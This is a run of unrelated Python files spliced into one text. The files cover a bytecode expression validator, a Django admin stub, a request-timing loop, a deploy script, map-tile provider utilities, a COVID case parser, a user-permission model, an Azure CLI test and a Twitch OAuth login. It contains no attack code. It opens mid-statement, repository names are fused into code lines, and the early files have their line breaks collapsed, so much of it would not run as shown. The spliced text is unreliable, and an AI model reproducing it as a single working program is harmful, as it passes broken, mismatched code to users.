== "store" assert len(item) == 1 assert item[0].kind == "STORE_FAST" else: print(node[0][1][0]) raise AssertionError("what is this?") def expr(node): assert node.kind == "expr" assert len(node) == 1 return node[0] def is_pi(node): return ( node.kind == "attribute" and len(node) == 2 and expr(node[0]).kind == "LOAD_FAST" and expr(node[0]).attr == "lib" and 
node[1].kind == "LOAD_ATTR" and node[1].attr == "pi" ) def is_nan_to_num(node): if node.kind == "call_kw36" and len(node) >= 3: function = expr(node[0]) return ( function.kind == "attribute" and expr(function[0]).attr == "lib" and function[1].attr == "nan_to_num" ) else: return False def analyze_return(node, context): assert node.kind == "sstmt" assert len(node) == 1 assert node[0].kind == "return", "compute function must end with a 'return'" assert len(node[0]) == 2 assert node[0][0].kind == "ret_expr" assert len(node[0][0]) == 1 expr(node[0][0][0]) assert node[0][1].kind == "RETURN_VALUE" if node[0][0][0][0].kind == "tuple": assert len(node[0][0][0][0]) >= 2, "returning an empty tuple?" assert node[0][0][0][0][-1].kind.startswith("BUILD_TUPLE") for item in node[0][0][0][0][:-1]: analyze_expression(expr(item), context) else: analyze_expression(node[0][0][0][0], context) def analyze_expression(node, context): if node.kind == "LOAD_FAST": # Don't bother checking to see if this variable has been defined. # Unit checks test that if the coverage is complete. pass elif node.kind == "LOAD_CONST": assert isinstance(node.attr, (int, float)) elif is_pi(node): pass elif node.kind == "unary_op": assert len(node) == 2 analyze_expression(expr(node[0]), context) assert node[1].kind == "unary_operator" assert len(node[1]) == 1 analyze_unary_operator(node[1][0], context) elif node.kind == "bin_op": assert len(node) == 3 analyze_expression(expr(node[0]), context) analyze_expression(expr(node[1]), context) assert node[2].kind == "binary_operator" assert len(node[2]) == 1 analyze_binary_operator(node[2][0], context) elif node.kind == "compare": assert len(node) == 1 assert node[0].kind == "compare_single", "only do single comparisons" assert len(node[0]) == 3 analyze_expression(expr(node[0][0]), context) analyze_expression(expr(node[0][1]), context) assert node[0][2].kind == "COMPARE_OP" assert ( node[0][2].attr in allowed_comparisons ), f"add {repr(node[0][2].attr)} to allowed_comparisons" elif node.kind == "call": assert len(node) >= 2 assert node[-1].kind.startswith("CALL_METHOD") or node[-1].kind.startswith( "CALL_FUNCTION" ) analyze_callable(expr(node[0]), context) for argument in node[1:-1]: assert argument.kind == "pos_arg", "only positional arguments" analyze_expression(expr(argument[0]), context) elif is_nan_to_num(node): analyze_expression(expr(node[1]), context) else: print(node) raise AssertionError("what is this?") def analyze_unary_operator(node, context): assert ( node.kind in allowed_unary_operators ), f"add {repr(node.kind)} to allowed_unary_operators" def analyze_binary_operator(node, context): assert ( node.kind in allowed_binary_operators ), f"add {repr(node.kind)} to allowed_binary_operators" def analyze_callable(node, context): if node.kind == "attribute37": assert len(node) == 2 module = expr(node[0]) assert module.kind == "LOAD_FAST" or module.kind == "LOAD_GLOBAL" assert node[1].kind == "LOAD_METHOD" if module.attr == "lib": assert ( node[1].attr in allowed_lib_functions ), f"add {repr(node[1].attr)} to allowed_lib_functions" else: module_name = ".".join( context.closure.get(module.attr).__name__.split(".")[:-1] ) assert module_name in ( "vector.compute.planar", "vector.compute.spatial", "vector.compute.lorentz", ) elif node.kind == "LOAD_GLOBAL" or node.kind == "LOAD_DEREF": function = context.closure.get(node.attr) assert ( function is not None ), f"unrecognized function in scope: {repr(node.attr)}" analyze_function(function) else: print(node) raise AssertionError("what is this?") 
allowed_unary_operators = [ "UNARY_NEGATIVE", ] allowed_binary_operators = [ "BINARY_ADD", "BINARY_SUBTRACT", "BINARY_MULTIPLY", "BINARY_TRUE_DIVIDE", "BINARY_MODULO", "BINARY_POWER", "BINARY_AND", ] allowed_comparisons = [ "==", "!=", "<", ">", ] allowed_lib_functions = [ "absolute", "sign", "copysign", "maximum", "sqrt", "exp", "log", "sin", "cos", "tan", "arcsin", "arccos", "arctan", "arctan2", "sinh", "cosh", "arctanh", "isclose", ] namanshrimali/simplif-ai import numpy as np import torch import random def seed_everything(seed = 1): random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) torch.cuda.manual_seed_all(seed)hisergiorojas/gltf2usd from _gltf2usd.gltf2.Skin import Skin from _gltf2usd.gltf2.Node import Node from _gltf2usd.gltf2.Animation import Animation from _gltf2usd.gltf2.Scene import Scene from _gltf2usd.gltf2.Mesh import Mesh from _gltf2usd.gltf2.Material import Material rosadigital/blog0 from django.contrib import admin from .models import Post, Categories, Profile, Comment # Register your models here. admin.site.register(Post) admin.site.register(Categories) admin.site.register(Profile) admin.site.register(Comment)1-10 # # Copyright 2019-2020 Captech Partners and the original author or authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
# # Authors: (), (), () # import requests import time # test assemble time cs = [1, 3, 10, 30, 100, 300, 1000, 3000, 10000] for c in cs: total = 0 for _ in range(c): start = time.time() requests.get("http://192.168.127.12:5000/back-to-school/lb1") end = time.time() total += end - start print(c, total) # test memory usage # r = 0 # while r < 10000: # requests.get("http://localhost:5000/back-to-school/lb1") # r += 1 # -*- coding: utf-8 -*- import json import logging def read_json_config(config_file): logger.debug(f'Reading config file: {config_file}') with open(config_file, 'r') as f: return json.load(f) def setup_logging(name="Error logs"): global logger logger = logging.getLogger(name) logger.setLevel(logging.DEBUG) ch = logging.StreamHandler() fmt = "%(asctime)s %(levelname)s - %(message)s " \ + "(%(filename)s:%(lineno)s PID %(process)d)" formatter = logging.Formatter(fmt) ch.setFormatter(formatter) logger.addHandler(ch) return logger aotuai/brainframe-qt __version__ = "0.30.0" import re S = input() print("YES" if re.match("^(dream|dreamer|erase|eraser)*$", S) else "NO" ) from enum import Enum class RotationDirection(Enum): CLCKWISE = 1 CNTR_CLCKWISE = 20 #!/usr/bin/env python3 import argparse import json import os from pathlib import Path import platform import time from lib.ip_check import * from lib.unix import Unix from lib.windows import Windows class Deploy: """ Base class for RoboLab Deploy-Script """ def __init__(self, configure=False, execute_only=True, backup=False, sync_log=False, start_session=True, tar=False, exam=False): """ Initializes Deploy-Script, creates all necessary folders and files, loads environment defaults :param configure: bool :param execute_only: bool :param backup: bool :param sync_log: bool :param start_session: bool :param tar: bool :param exam: bool """ # Flags and variables setup self.configure = configure self.execute_only = execute_only self.backup = backup self.sync_log = sync_log self.start_session = start_session self.tar = tar self.exam = exam self.settings = dict() # Path and File setup self.base_path = Path(os.path.dirname(os.path.abspath(__file__))) self.bin_path = self.base_path.joinpath('.bin') self.bin_path.mkdir(mode=0o700, exist_ok=True) self.settings_file = self.bin_path.joinpath('settings.json') # Start re-configuration or create new one if self.configure or not self.settings_file.exists(): self.__setup_deploy() # Load configuration with self.settings_file.open() as file: self.settings = json.load(file) def routine(self): """ Handle flags and starts tmux session :return: void """ if self.settings['os'] == 'Windows': system = Windows(self.configure, self.base_path, self.bin_path, self.settings, self.exam) else: system = Unix(self.configure, self.base_path, self.bin_path, self.settings, self.exam) try: if self.backup: system.backup() return if self.sync_log: system.sync_log() return if self.execute_only: if not self.tar or not system.copy_files_tar(): system.copy_files() if self.start_session: system.start_session() finally: system.cleanup() return def __setup_deploy(self): """ Creates or updates Deploy-Script configuration :return: void """ init_dict = dict() init_dict['os'] = platform.system() init_dict['ip'] = ip_check() # Dump data into file self.settings_file.touch() with self.settings_file.open('w') as file: json.dump(init_dict, file, indent=4) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument( '-c', '--configure', help='Create new or reset current configuration', action='store_true') 
parser.add_argument( '-e', '--execute-only', help='Execute only without copying new files', action='store_false', default=True) parser.add_argument( '-b', '--backup', help='Create a remote backup of your files on the brick', action='store_true', default=False) parser.add_argument( '-s', '--sync-log', help='Synchronize log files from the brick', action='store_true', default=False) parser.add_argument( '-r', '--reload', help='Only copy files / reload, but do not start a new session', action="store_true", default=False) parser.add_argument( "-t", "--tar", help='Use the tar method to copy files (implies -r)', action='store_true', default=False) parser.add_argument( '-E', '--exam', help='Run in exam mode (clean src before executing)', action='store_true', default=False) args = parser.parse_args() print("Starting deploy at " + str(time.time())) try: print('If you need to change the IP address or your underlying OS, please run\n\t./deploy.py -c') deploy = Deploy(args.configure, args.execute_only, args.backup, args.sync_log, not args.reload and not args.tar, args.tar, args.exam) deploy.routine() except Exception as e: print(e) raise """ Utilities to support XYZservices """ import json import uuid from typing import Optional class Bunch(dict): """A dict with attribute-access :class:`Bunch` is used to store :class:`TileProvider` objects. Examples -------- >>> black_and_white = TileProvider( ... name="My black and white tiles", ... url="https://myserver.com/bw/{z}/{x}/{y}", ... attribution="(C) xyzservices", ... ) >>> colorful = TileProvider( ... name="My colorful tiles", ... url="https://myserver.com/color/{z}/{x}/{y}", ... attribution="(C) xyzservices", ... ) >>> MyTiles = Bunch(BlackAndWhite=black_and_white, Colorful=colorful) >>> MyTiles {'BlackAndWhite': {'name': 'My black and white tiles', 'url': \ 'https://myserver.com/bw/{z}/{x}/{y}', 'attribution': '(C) xyzservices'}, 'Colorful': \ {'name': 'My colorful tiles', 'url': 'https://myserver.com/color/{z}/{x}/{y}', \ 'attribution': '(C) xyzservices'}} >>> MyTiles.BlackAndWhite.url 'https://myserver.com/bw/{z}/{x}/{y}' """ def __getattr__(self, key): try: return self.__getitem__(key) except KeyError: raise AttributeError(key) def __dir__(self): return self.keys() def _repr_html_(self, inside=False): children = "" for key in self.keys(): if isinstance(self[key], TileProvider): obj = "xyzservices.TileProvider" else: obj = "xyzservices.Bunch" uid = str(uuid.uuid4()) children += f"""
  <li id="{uid}">{key} <span>{obj}</span>: {self[key]._repr_html_(inside=True)}</li>
  """ style = "" if inside else f"<style>{CSS_STYLE}</style>" html = f"""
    {style}
    <div class="xyz-obj">xyzservices.Bunch</div>
    <div class="xyz-name">{len(self)} items</div>
    <ul class="xyz-collapsible">{children}</ul>
    """ return html class TileProvider(Bunch): """ A dict with attribute-access and that can be called to update keys Examples -------- You can create custom :class:`TileProvider` by passing your attributes to the object as it would have been a ``dict()``. It is required to always specify ``name``, ``url``, and ``attribution``. >>> public_provider = TileProvider( ... name="My public tiles", ... url="https://myserver.com/tiles/{z}/{x}/{y}.png", ... attribution="(C) xyzservices", ... ) Alternatively, you can create it from a dictionary of attributes. When specifying a placeholder for the access token, please use the ``""`` string to ensure that :meth:`~xyzservices.TileProvider.requires_token` method works properly. >>> private_provider = TileProvider( ... { ... "url": "https://myserver.com/tiles/{z}/{x}/{y}.png?apikey={accessToken}", ... "attribution": "(C) xyzservices", ... "accessToken": "", ... "name": "my_private_provider", ... } ... ) You can then fetch all information as attributes: >>> public_provider.url 'https://myserver.com/tiles/{z}/{x}/{y}.png' >>> public_provider.attribution '(C) xyzservices' To ensure you will be able to use the tiles, you can check if the :class:`TileProvider` requires a token or API key. >>> public_provider.requires_token() False >>> private_provider.requires_token() True You can also generate URL in the required format with or without placeholders: >>> public_provider.build_url() 'https://myserver.com/tiles/{z}/{x}/{y}.png' >>> private_provider.build_url(x=12, y=21, z=11, accessToken="my_token") 'https://myserver.com/tiles/11/12/21.png?access_token=my_token' """ def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) missing = [] for el in ["name", "url", "attribution"]: if el not in self.keys(): missing.append(el) if len(missing) > 0: msg = ( f"The attributes `name`, `url`, " f"and `attribution` are required to initialise " f"a `TileProvider`. Please provide values for: " f'`{"`, `".join(missing)}`' ) raise AttributeError(msg) def __call__(self, **kwargs): new = TileProvider(self) # takes a copy preserving the class new.update(kwargs) return new def copy(self, **kwargs): new = TileProvider(self) # takes a copy preserving the class return new def build_url( self, x: Optional[int] = None, y: Optional[int] = None, z: Optional[int] = None, scale_factor: Optional[str] = None, **kwargs, ) -> str: """ Build the URL of tiles from the :class:`TileProvider` object Can return URL with placeholders or the final tile URL. Parameters ---------- x, y, z : int (optional) tile number scale_factor : str (optional) Scale factor (where supported). For example, you can get double resolution (512 x 512) instead of standard one (256 x 256) with ``"@2x"``. If you want to keep a placeholder, pass `"{r}"`. **kwargs Other potential attributes updating the :class:`TileProvider`. 
Returns ------- url : str Formatted URL Examples -------- >>> import xyzservices.providers as xyz >>> xyz.CartoDB.DarkMatter.build_url() 'https://a.basemaps.cartocdn.com/dark_all/{z}/{x}/{y}.png' >>> xyz.CartoDB.DarkMatter.build_url(x=9, y=11, z=5) 'https://a.basemaps.cartocdn.com/dark_all/5/9/11.png' >>> xyz.CartoDB.DarkMatter.build_url(x=9, y=11, z=5, scale_factor="@2x") 'https://a.basemaps.cartocdn.com/dark_all/5/9/11@2x.png' >>> xyz.MapBox.build_url(accessToken="my_token") 'https://api.mapbox.com/styles/v1/mapbox/streets-v11/tiles/{z}/{x}/{y}?access_token=my_token' """ provider = self.copy() if x is None: x = "{x}" if y is None: y = "{y}" if z is None: z = "{z}" provider.update(kwargs) if provider.requires_token(): raise ValueError( "Token is required for this provider, but not provided. " "You can either update TileProvider or pass respective keywords " "to build_url()." ) url = provider.pop("url") subdomains = provider.pop("subdomains", "abc") if scale_factor: r = scale_factor provider.pop("r", None) else: r = provider.pop("r", "") return url.format(x=x, y=y, z=z, s=subdomains[0], r=r, **provider) def requires_token(self) -> bool: """ Returns ``True`` if the TileProvider requires access token to fetch tiles. The token attribute name vary and some :class:`TileProvider` objects may require more than one token (e.g. ``HERE``). The information is deduced from the presence of `'"`` string to ensure that :meth:`~xyzservices.TileProvider.requires_token` method works properly. Returns ------- bool Examples -------- >>> import xyzservices.providers as xyz >>> xyz.MapBox.requires_token() True >>> xyz.CartoDB.Positron False We can specify this API key by calling the object or overriding the attribute. Overriding the attribute will alter existing object: >>> xyz.OpenWeatherMap.Clouds["apiKey"] = "my-private-api-key" Calling the object will return a copy: >>> xyz.OpenWeatherMap.Clouds(apiKey="my-private-api-key") """ # both attribute and placeholder in url are required to make it work for key, val in self.items(): if isinstance(val, str) and "{key}
" in val and "{" + key + "}" in self["url"]: return True return False def _repr_html_(self, inside=False): provider_info = "" for key, val in self.items(): if key != "name": provider_info += f"<dt><span>{key}</span></dt><dd>{val}</dd>" style = "" if inside else f"<style>{CSS_STYLE}</style>" html = f"""
    {style}
    <div class="xyz-obj">xyzservices.TileProvider</div>
    <div class="xyz-name">{self.name}</div>
    <dl class="xyz-attrs">{provider_info}</dl>
    """ return html def _load_json(f): data = json.loads(f) providers = Bunch() for provider_name in data.keys(): provider = data[provider_name] if "url" in provider.keys(): providers[provider_name] = TileProvider(provider) else: providers[provider_name] = Bunch( {i: TileProvider(provider[i]) for i in provider} ) return providers CSS_STYLE = """ /* CSS stylesheet for displaying xyzservices objects in Jupyter.*/ .xyz-header { padding-top: 6px; padding-bottom: 6px; margin-bottom: 4px; border-bottom: solid 1px #ddd; } .xyz-header>div { display: inline; margin-top: 0; margin-bottom: 0; } .xyz-obj, .xyz-name { margin-left: 2px; margin-right: 10px; } .xyz-obj { color: #555; } .xyz-name { color: #000; } .xyz-attrs { grid-column: 1 / -1; } dl.xyz-attrs { padding: 0; margin: 0; display: grid; grid-template-columns: 125px auto; background-color: rgb(244, 244, 244); } .xyz-attrs dt, dd { padding: 0; margin: 0; float: left; padding-right: 10px; width: auto; } .xyz-attrs dt { font-weight: normal; grid-column: 1; } .xyz-attrs dt:hover span { display: inline-block; background: #fff; padding-right: 10px; } .xyz-attrs dd { grid-column: 2; white-space: pre-wrap; word-break: break-all; } .xyz-details ul>li>label>span { color: #555; padding-left: 10px; } .xyz-inside { display: none; } .xyz-checkbox:checked~.xyz-inside { display: contents; } .xyz-collapsible li>input { display: none; } .xyz-collapsible>li>label { cursor: pointer; } .xyz-collapsible>li>label:hover { color: #555; } ul.xyz-collapsible { list-style: none!important; padding-left: 20px!important; } .xyz-checkbox+label:before { content: '►'; font-size: 11px; } .xyz-checkbox:checked+label:before { content: '▼'; } .xyz-wrap { margin-bottom: 10px; } """ from JumpScale import j import time j.application.start("jumpscale:watchdogmanager") import JumpScale.baselib.watchdog.manager while True: print "check" j.tools.watchdog.manager.checkWatchdogEvents() time.sleep(5) j.application.stop() ingestion/functions/parsing/saopaolo/saopaolo.py import os import sys from datetime import datetime import csv # Layer code, like parsing_lib, is added to the path by AWS. # To test locally (e.g. via pytest), we have to modify sys.path. # pylint: disable=import-error try: import parsing_lib except ImportError: sys.path.append( os.path.join( os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "common/python" ) ) import parsing_lib def convert_date(raw_date): """ Convert raw date field into a value interpretable by the dataserver. """ date = datetime.strptime(raw_date, "%Y-%m-%d") return date.strftime("%m/%d/%YZ") def parse_cases(raw_data_file: str, source_id: str, source_url: str): """ Parses G.h-format case data from raw API data. Some caveats: 1. There are no patient ID/case ID in the raw API so we aren't able to dedupe. 2. We can't link confirmed cases and confirmed deaths because of (1) so we're only importing confirmed cases and ignoring deaths. 
""" with open(raw_data_file, "r") as f: reader = csv.DictReader(f, delimiter=";") for row in reader: num_confirmed_cases = int(row["casos_novos"]) if (not num_confirmed_cases) or (row["nome_munic"] == "Ignorado"): continue try: when = convert_date(row["datahora"]) case = { "caseReference": {"sourceId": source_id, "sourceUrl": source_url}, "location": {"query": f"{row['nome_munic']}, São Paulo, Brazil"}, "events": [ { "name": "confirmed", "dateRange": { "start": when, "end": when, }, }, ], } for _ in range(num_confirmed_cases): yield case except ValueError as ve: raise ValueError("Unhandled data: {}".format(ve)) def lambda_handler(event, context): return parsing_lib.run_lambda(event, context, parse_cases) from sqlalchemy import event from sqlalchemy.orm import relationship from sqlalchemy.schema import Table, Column, ForeignKey from sqlalchemy.types import LargeBinary, String from .base import Base, BaseMixin class User(Base, BaseMixin): email = Column(String(length=100), nullable=False, unique=True) name = Column(String(length=100)) username = Column(String(length=100), unique=True) password = Column(LargeBinary(60), nullable=False) roles = relationship('Role', secondary='user_role') @property def permissions(self): perms = set() for role in self.roles: perms.update(role.permissions) return perms def has_role(self, key): keys = set(role.key for role in self.roles) if 'sudo' in keys: return True return key in keys def has_permission(self, key): keys = set(permission.key for permission in self.permissions) if 'sudo' in keys: return True return key in keys @event.listens_for(User.password, 'set', retval=True) def hash_password(user, plain_text_password, old_hashed_password, event): import tangled.site.auth return tangled.site.auth.hash_password(plain_text_password) class Permission(Base): __tablename__ = 'permission' key = Column(String(length=50), primary_key=True) description = Column(String(length=100)) class Role(Base): __tablename__ = 'role' key = Column(String(length=50), primary_key=True) description = Column(String(length=100)) permissions = relationship(Permission, secondary='role_permission') role_permission_table = Table( 'role_permission', Base.metadata, Column('role_key', ForeignKey(Role.key), primary_key=True), Column('permission_key', ForeignKey(Permission.key), primary_key=True)) user_role_table = Table( 'user_role', Base.metadata, Column('user_id', ForeignKey(User.id), primary_key=True), Column('role_key', ForeignKey(Role.key), primary_key=True)) # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. 
# -------------------------------------------------------------------------------------------- from azure.cli.testsdk import ResourceGroupPreparer, JMESPathCheck from azure.cli.testsdk import ScenarioTest, record_only from .afdx_scenario_mixin import CdnAfdScenarioMixin class CdnAfdOriginScenarioTest(CdnAfdScenarioMixin, ScenarioTest): @ResourceGroupPreparer() def test_afd_origin_crud(self, resource_group): profile_name = self.create_random_name(prefix='profile', length=16) self.afd_profile_create_cmd(resource_group, profile_name, sku="Premium_AzureFrontDoor") origin_group_name = self.create_random_name(prefix='og', length=16) self.afd_origin_group_create_cmd(resource_group, profile_name, origin_group_name, "--probe-request-type GET --probe-protocol Http --probe-interval-in-seconds 120 --probe-path /test1/azure.txt " "--sample-size 4 --successful-samples-required 3 --additional-latency-in-milliseconds 50") origin_name = self.create_random_name(prefix='origin', length=16) create_options = "--host-name plstestcli.blob.core.windows.net " \ + "--origin-host-header plstestcli.blob.core.windows.net " \ + "--priority 1 --weight 1000 --http-port 80 --https-port 443 --enabled-state Enabled" create_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 80), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 1000), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', True), JMESPathCheck('provisioningState', 'Succeeded')] self.afd_origin_create_cmd(resource_group, profile_name, origin_group_name, origin_name, create_options, create_checks) origin_name1 = self.create_random_name(prefix='origin', length=16) create_options = "--host-name huaiyiztesthost1.blob.core.chinacloudapi.cn " \ + "--enforce-certificate-name-check false " \ + "--origin-host-header huaiyiztesthost1.blob.core.chinacloudapi.cn " \ + "--priority 1 --weight 666 --http-port 8080 --https-port 443 --enabled-state Enabled" create_checks = [JMESPathCheck('name', origin_name1), JMESPathCheck('hostName', "huaiyiztesthost1.blob.core.chinacloudapi.cn"), JMESPathCheck('httpPort', 8080), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 666), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', False), JMESPathCheck('provisioningState', 'Succeeded')] self.afd_origin_create_cmd(resource_group, profile_name, origin_group_name, origin_name1, create_options, create_checks) list_checks = [JMESPathCheck('length(@)', 2), JMESPathCheck('@[0].name', origin_name), JMESPathCheck('@[1].name', origin_name1)] self.afd_origin_list_cmd(resource_group, profile_name, origin_group_name, checks=list_checks) update_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 8080), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 58), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', False), JMESPathCheck('provisioningState', 'Succeeded')] options = '--weight 58 --http-port 8080 --enforce-certificate-name-check false' self.afd_origin_update_cmd(resource_group, profile_name, origin_group_name, origin_name, options=options, checks=update_checks) update_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 8080), 
JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 58), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', True), JMESPathCheck('provisioningState', 'Succeeded')] options = '--enforce-certificate-name-check true' self.afd_origin_update_cmd(resource_group, profile_name, origin_group_name, origin_name, options=options, checks=update_checks) update_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 80), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 58), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', True), JMESPathCheck('sharedPrivateLinkResource.privateLink.id', f"/subscriptions/{self.get_subscription_id()}/resourceGroups/CliDevReservedGroup/providers/Microsoft.Storage/storageAccounts/plstestcli"), JMESPathCheck('sharedPrivateLinkResource.groupId', "blob"), JMESPathCheck('sharedPrivateLinkResource.privateLinkLocation', "eastus"), JMESPathCheck('sharedPrivateLinkResource.requestMessage', "Private link service from AFD"), JMESPathCheck('provisioningState', 'Succeeded')] options = '--http-port 80 --enable-private-link --private-link-resource ' \ + f' /subscriptions/{self.get_subscription_id()}/resourceGroups/CliDevReservedGroup/providers/Microsoft.Storage/storageAccounts/plstestcli' \ + ' --private-link-sub-resource blob' \ + ' --private-link-location eastus' \ + ' --private-link-request-message "Private link service from AFD"' self.afd_origin_update_cmd(resource_group, profile_name, origin_group_name, origin_name, options=options, checks=update_checks) update_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 80), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 58), JMESPathCheck('enabledState', "Enabled"), JMESPathCheck('enforceCertificateNameCheck', True), JMESPathCheck('sharedPrivateLinkResource.privateLink.id', f"/subscriptions/{self.get_subscription_id()}/resourceGroups/CliDevReservedGroup/providers/Microsoft.Storage/storageAccounts/plstestcli"), JMESPathCheck('sharedPrivateLinkResource.groupId', "table"), JMESPathCheck('sharedPrivateLinkResource.privateLinkLocation', "eastus"), JMESPathCheck('sharedPrivateLinkResource.requestMessage', "Private link service from AFD"), JMESPathCheck('provisioningState', 'Succeeded')] options = '--private-link-sub-resource table' self.afd_origin_update_cmd(resource_group, profile_name, origin_group_name, origin_name, options=options, checks=update_checks) update_checks = [JMESPathCheck('name', origin_name), JMESPathCheck('hostName', "plstestcli.blob.core.windows.net"), JMESPathCheck('httpPort', 80), JMESPathCheck('httpsPort', 443), JMESPathCheck('priority', 1), JMESPathCheck('weight', 99), JMESPathCheck('enabledState', "Disabled"), JMESPathCheck('enforceCertificateNameCheck', True), JMESPathCheck('sharedPrivateLinkResource', None), JMESPathCheck('provisioningState', 'Succeeded')] options = '--weight 99 --enable-private-link false --enabled-state Disabled' self.afd_origin_update_cmd(resource_group, profile_name, origin_group_name, origin_name, options=options, checks=update_checks) self.afd_origin_delete_cmd(resource_group, profile_name, origin_group_name, origin_name) self.afd_origin_delete_cmd(resource_group, profile_name, origin_group_name, origin_name1) list_checks = [JMESPathCheck('length(@)', 0)] 
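# After both origins have been deleted, listing the origin group should return an empty collection.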
self.afd_origin_list_cmd(resource_group, profile_name, origin_group_name, list_checks)

# TODO: Generalize this with the discordutil module, factor out oauth
import logging
from urllib.parse import urlencode

import requests
import json

from flask import request, redirect, session

from creds import get_creds
from config import config
from sessionutil import invalidate_session


def twitch_login():
    ss = get_creds()
    params = {
        "client_id": ss["twitch_client_id"],
        "redirect_uri": "%s/api/ident/twitchcb" % config.MY_URL,
        "state": True,
        "response_type": "code",
        "scope": "openid",  # not user_read, id_token, or user_subscriptions
        # need to request objects for the later userinfo request
        "claims": json.dumps({
            "id_token": {},
            "userinfo": {
                "picture": "null",
                "preferred_username": "null",
            }
        })
    }
    redirect_url = "%s/oauth2/authorize?%s" % (
        config.TWITCH_API_URL, urlencode(params))
    return redirect(redirect_url)


def twitch_login_cb():
    user_authenticated = False
    result = "Missing code"
    code = request.args.get("code")
    scope = request.args.get("scope")
    if code is not None and scope == "openid":
        # fetch a token
        user_authenticated = fetch_twitch_token(code)
        if user_authenticated:
            user_fetch_worked = fetch_twitch_user()
            if not user_fetch_worked:
                invalidate_session()
                return redirect("/")
            return redirect("/user")
    return result


# TODO: this should be cached until expiration
# The server can reuse this for API requests
# TODO: factor this out with discord auth to oauth..auth
def fetch_twitch_token(code):
    # on success, session has the token to use
    ss = get_creds()
    result = False
    body_payload = {
        "client_id": ss["twitch_client_id"],
        "client_secret": ss["twitch_client_secret"],
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": "%s/api/ident/twitchcb" % config.MY_URL,
    }
    # redirect_uri may need to match original cb URI (twitch_login_cb)
    extra_headers = {
        "Content-Type": "application/x-www-form-urlencoded",
    }
    response = requests.post(
        "%s/oauth2/token" % config.TWITCH_API_URL,
        data=urlencode(body_payload),
        headers=extra_headers)
    logging.debug("fetch_twitch_token: headers: %s\n\traw response: %s" % (
        response.headers, response.text))
    try:
        token_response = json.loads(response.text)
        if "access_token" in token_response and "refresh_token" in token_response:
            session["token_response"] = token_response
            result = True
        else:
            logging.warning("NO refresh_token AVAILABLE, BAD AUTH!")
    except ValueError as e:
        logging.error("ValueError: " + str(e))
        result = False
    return result


def fetch_twitch_user():
    if "token_response" not in session:
        return False
    token = session["token_response"]
    if "token_type" not in token or "access_token" not in token:
        return False
    auth_header_token_type = ""
    # token request returns "bearer", not "Bearer" sometimes
    if token["token_type"] in ["bearer", "Bearer"]:
        auth_header_token_type = "Bearer"
    # these are attached to the session in fetch_twitch_token
    extra_headers = {
        "Authorization": "%s %s" % (
            auth_header_token_type, token["access_token"]
        ),
    }
    response = requests.get(
        "%s/oauth2/userinfo" % config.TWITCH_API_URL,
        headers=extra_headers)
    logging.debug("fetch_twitch_user: headers: %s\n\traw response: %s" % (
        response.headers, response.text))
    twitch_avatar_url = None
    twitch_username = None
    twitch_id = None
    try:
        logging.debug("fetch_twitch_user response: %s" % response.text)
        parsed_response = json.loads(response.text)
        twitch_id = parsed_response["sub"]
        twitch_username = parsed_response["preferred_username"]
        twitch_avatar_url = parsed_response["picture"]
    except ValueError as e:
        logging.error("ValueError: " + str(e))
        return False
    ss = get_creds()
    # TODO: move away from "discord" to a generic auth provider
    session["discord"] = {
        "full_username": twitch_username,
        # TODO: get the right avatar from picture
        "avatar_url": twitch_avatar_url,
        "id": twitch_id,
        "authorized": twitch_id in ss["authorized_twitch_ids"]
    }
    return True

ceilometer/tests/unit/compute/virt/libvirt/test_inspector.py
# Copyright 2012 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for libvirt inspector.
"""
try:
    import contextlib2 as contextlib  # for Python < 3.3
except ImportError:
    import contextlib

import fixtures
import mock
from oslo_utils import units
from oslotest import base

from ceilometer.compute.virt import inspector as virt_inspector
from ceilometer.compute.virt.libvirt import inspector as libvirt_inspector


class TestLibvirtInspection(base.BaseTestCase):

    class fakeLibvirtError(Exception):
        pass

    def setUp(self):
        super(TestLibvirtInspection, self).setUp()

        class VMInstance(object):
            id = 'ff58e738-12f4-4c58-acde-77617b68da56'
            name = 'instance-00000001'
        self.instance = VMInstance
